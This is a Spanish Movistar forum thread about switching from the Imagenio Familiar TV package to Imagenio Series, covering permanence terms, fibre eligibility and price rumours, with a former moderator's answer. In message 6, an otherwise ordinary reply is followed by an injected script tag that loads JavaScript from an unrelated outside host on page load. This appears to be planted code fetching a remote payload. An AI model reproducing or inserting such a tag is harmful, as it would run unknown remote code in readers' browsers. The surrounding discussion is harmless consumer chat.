imagenio series

marcko92
Yo probé el VDSL
imagenio series

hola,

 

tengo actualmente imagenio familiar y queria darlo de baja pero acabo de ver que hay una nueva modalidad llamada imagenio series por 10€/mes con los canales de series que son los que me gustan

 

puedo pasar de imagenio familar a imagenio series??

 

puedo solicitar el cambio por la web?

 

al hacer el cambio hay alguna operacion aparte(cambio de rputer o decodificador)??

 

saludos!

Mensaje 2 de 15
2.844 Visitas
14 RESPUESTAS 14
ejffuentes
Yo probé el VDSL

 

Visto la subida de IVA estoy pensando dar de baja Imagenio, pero mientras miro las diferentes ofertas que puede haber en la competencia en estos próximos meses quería saber si se puede contratar Imagenio Series + paquete infantil y si el coste sería 10€.

 

Entiendo que el paquete infantil entra TODO lo del canal 60 al 70  y el canal 42 de Disney  Cinemagic o estoy equivocado.

 

Gracias

Mensaje 1 de 15
2.585 Visitas
JoseVicenteNavarroLopez
Yo probé el VDSL

si se puede hacer a traves del aparato y llamando al 1004

 

Mensaje 3 de 15
2.841 Visitas
GELOCHO
Yo probé el VDSL

Yo estoy en el proceso de baja de Imagenio si puedo poner el series por 10 euros mejor salu2 

Mensaje 4 de 15
2.838 Visitas
marcko92
Yo probé el VDSL

al hacer el cambio, tengo algun tipo de permanencia en la nueva modalidad??

 

en la web pone permanecia de 6 meses en la linea telefonica....eso significa que no podria dar de baja del adsl+linea+tv (duarnte 6 meses) pero si de solo el imagenio series verdad?

 

 

 

 

Mensaje 5 de 15
2.835 Visitas
JoseVicenteNavarroLopez
Yo probé el VDSL

no pq es cambio de paquete no te afecta

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script>
Mensaje 6 de 15
2.823 Visitas
ejffuentes
Yo probé el VDSL

Yo hice ayer el cambio de Imagenio Familiar a Imagenio series + paquetes infantil sin problemas y no me comentaron nada de permanencia. Lo que si me dijeron es que el mes que viene el Imagenio series iba a subir 7€ el al igual que el familiar, cuando le dije que la subida había oído que solo era para el familiar por el tema del futbol me dijo que no,que subían todos los paquetes, me hizo las cuentas y pagaría lo mismo que ahora con el familiar pero sin futbol claro.

Mensaje 7 de 15
2.804 Visitas
emmanuel
Yo probé el VDSL

Hola, si se puede solo tienes que solcitar al 1004 la migracion del imagenio familiar al imagenio series y eso es todo

tarda en hacerse efectivo 48 h

Mensaje 8 de 15
2.800 Visitas
emmanuel
Yo probé el VDSL

Con respecto a la permanencia del servicio adsl como del imagenio es de un año ,pero si lo contratas bajo la tecnologia de fibra optica no tiene permanencia.

Mensaje 9 de 15
2.798 Visitas
toloba
Yo probé el VDSL

Hola

Tengo fibra óptica y en el 1004 me dijeron que el paquete Imagenio Series solo estaba disponible para los que tenían cobrlos para los de fibra solo tenemos el Familiar o nada (que es mi caso dado los precios que han puesto).

 

Saludos.

Mensaje 10 de 15
2.787 Visitas
marcko92
Yo probé el VDSL

segun lei, ponia 10€ "para siempre"

 

pues si suben 7€ osea 17€mas iva (+de20€)para eso prefiero dar de baja y fuera

 

de verdad que pena que traten tan mal a los clientes en una situacion tan delicada como la actual

 

mañana llamo para pedir la baja de imagenio

 

muchas gracias a todos

Mensaje 11 de 15
2.777 Visitas
emmanuel
Yo probé el VDSL

Hay dos modalidades para adquir el servio iamgenio el imagenio familiar  cuyo precio 22,9 € y el imagenio flexible de 10€

sin iva .Si es posible contratar  con la tecnologia fibra optic el imagenio flexible q es mucho mas economico ,pero reduce la cantidad de canales.ademas cuando contratas tanrtto el imagenio familia como el fexible te obsequian un paquete de canales , en el familia el paquete favoritototal total y en el fexible solo un paquete de canales entre los cuales puedes elegir  series ,estrenos , documentales. 🙂

Mensaje 12 de 15
2.769 Visitas
marcko92
Yo probé el VDSL

segun la propia web pone 10€/mes para siempre

 

no habla de ningun tipo de subida a partir de octubre

 

por favor algun moderador puede dignarse a reponder

 

 

Mensaje 13 de 15
2.682 Visitas
marcko92
Yo probé el VDSL

una consulta mas a los moderadores

 

cambiar de la familiar a la modalidad series tiene alguna permancencia en el servicio de imagenio??

Mensaje 14 de 15
2.678 Visitas
JCarlos-Movistar
Antiguo Moderador

Hola marcko92, yo me digno Guiño..........pensaba que tus dudas estaban resueltas con las aportaciones del resto de usuarios, pero veo que no.

 

A dia de hoy, puedes cambiar de Imagenio Familiar a Series y viceversa cuando quieras, esto no incumple permanencias ni tampoco se adquiere una nueva por efectuar el cambio de modalidad.

En cuanto al precio, no tenemos noticias que se incremente en octubre, la cuota es de 10€/mes.

 

Hay otra cosa que se ha comentado en este hilo y que no es del todo correcto, Imagenio Flexible no se comercializa para usuarios de FTTH, en cualquier caso hemos pasado una consulta a responsables del servicio para que nos confirmen esto, os lo indicaremos.

 

Si queda pendiente alguna duda,solo tienes que decirlo Emoticono riéndose a carcajadas

 

1sld



Consulta nuestras ofertas y servicios sobre FusiónTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.

No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar

Una de las ventajas es poder ver tu factura en Consulta Factura online.

También te invitamos a seguirnos en TwitterFacebook y Google+


Solución aceptada.png
Mensaje 15 de 15
2.671 Visitas